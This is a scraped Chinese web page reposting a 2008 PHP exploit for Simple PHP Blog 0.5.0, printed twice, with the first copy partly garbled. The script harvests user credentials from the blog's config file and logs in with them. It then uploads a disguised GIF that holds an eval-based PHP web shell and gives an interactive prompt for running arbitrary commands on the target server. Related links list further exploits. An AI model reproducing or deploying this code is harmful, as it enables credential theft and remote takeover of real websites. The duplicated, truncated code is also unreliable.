您现在的位置是:网站首页> 编程资料编程资料
Simple PHP Blog (SPHPBlog) _Exploit_网络安全_
2023-05-24
442人已围观
简介 Simple PHP Blog (SPHPBlog) _Exploit_网络安全_
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = curl_init( $url );
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HEADER, 1);
curl_setopt ($ch, CURLOPT_REFERER,"$url");
if (strlen($postvar)<3) $postvar="123";
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);
if (strlen($cook)>3)
curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "
$err
";
curl_close($ch);
return $res;
} function error($msg){
print "
$msg
\nNot Exploitable";exit;
";
$res=curl("$url/images/emoticons/sphp.php","z=$eval");
$res=strstr($res,"GIF89a");
print substr($res,41);exit;
} if (strlen($url)>10)
{
print "\n
Trying to Get /config/users.php...";flush();
$res=curl($url."/config/users.php","");
if (strstr($res,'|')) print "Done!\n\n$res";
else error("\n\nUsername & Password Not Found\n\n$res"); print "\n
Trying to Get Username & Password...";flush();
$res=str_replace("\r\n","\n",$res);
$res=substr($res,strpos($res,"\n\n") 2);
$line=explode("\n",$res);$n=count($line)-1;
if ($n) {
print "\nDone! Found - $n users:\n";
for ($x=0;$x<$n;$x ){
$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);
print "\nUsername - ".$up[1]."\tPassword - ".$up[2];
}
} print "\n
Trying to Login...";flush();
$postvar="user=$user[0]&pass=$pass[0]&";
$res=curl($url."/login_cgi.php","$postvar");
$cook=strstr($res,'Set-Cookie: sid=');
$cook=substr($cook,12,strpos($cook,';')-12);
if ($cook) print "\n\nDone... Cookie - $cook";else error("\n
Trying to Upload Emoticon...";flush();
$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";
if (@filesize('sphp.php')!=82){
$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);
}
$f=getcwd()."/sphp.php";
$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));
if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n
Trying to Exploit...";flush();
$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n
Trying to Logout...";flush();
$res=curl($url."/logout.php","");
if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n
print "\nEnter PHP Command:\n";
}
print "";
?>
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = curl_init( $url );
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HEADER, 1);
curl_setopt ($ch, CURLOPT_REFERER,"$url");
if (strlen($postvar)<3) $postvar="123";
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);
if (strlen($cook)>3)
curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "
$err
";
curl_close($ch);
return $res;
} function error($msg){
print "
$msg
\n
Not Exploitable";exit;
} extract($_POST);extract($_GET); print "URL:
";$res=curl("$url/images/emoticons/sphp.php","z=$eval");
$res=strstr($res,"GIF89a");
print substr($res,41);exit;
} if (strlen($url)>10)
{
print "\n
Trying to Get /config/users.php...";flush();
$res=curl($url."/config/users.php","");
if (strstr($res,'|')) print "Done!\n\n$res";
else error("\n\nUsername & Password Not Found\n\n$res"); print "\n
Trying to Get Username & Password...";flush();
$res=str_replace("\r\n","\n",$res);
$res=substr($res,strpos($res,"\n\n") 2);
$line=explode("\n",$res);$n=count($line)-1;
if ($n) {
print "\nDone! Found - $n users:\n";
for ($x=0;$x<$n;$x ){
$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);
print "\nUsername - ".$up[1]."\tPassword - ".$up[2];
}
} print "\n
Trying to Login...";flush();
$postvar="user=$user[0]&pass=$pass[0]&";
$res=curl($url."/login_cgi.php","$postvar");
$cook=strstr($res,'Set-Cookie: sid=');
$cook=substr($cook,12,strpos($cook,';')-12);
if ($cook) print "\n\nDone... Cookie - $cook";else error("\n
Error To Login
\n\n\n$res"); print "\nTrying to Upload Emoticon...";flush();
$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";
if (@filesize('sphp.php')!=82){
$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);
}
$f=getcwd()."/sphp.php";
$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));
if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n
Error To Upload
\n\n\n$res"); print "\nTrying to Exploit...";flush();
$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n
Error To Exploit
\n\n\n$res"); print "\nTrying to Logout...";flush();
$res=curl($url."/logout.php","");
if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n
Error To Logout
\n\n\n$res");print "\nEnter PHP Command:\n";
}
print "";
?>
相关内容
- Acoustica Mixcraft _Exploit_网络安全_
- MyBulletinBoard (MyBB) _Exploit_网络安全_
- Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit _Exploit_网络安全_
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit _Exploit_网络安全_
- pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit _Exploit_网络安全_
- Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit _Exploit_网络安全_
- The Personal FTP Server 6.0f RETR Denial of Service Exploit _Exploit_网络安全_
- Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) _Exploit_网络安全_
- DESlock _Exploit_网络安全_
- Debian Sarge Multiple IMAP Server Denial of Service Exploit _Exploit_网络安全_
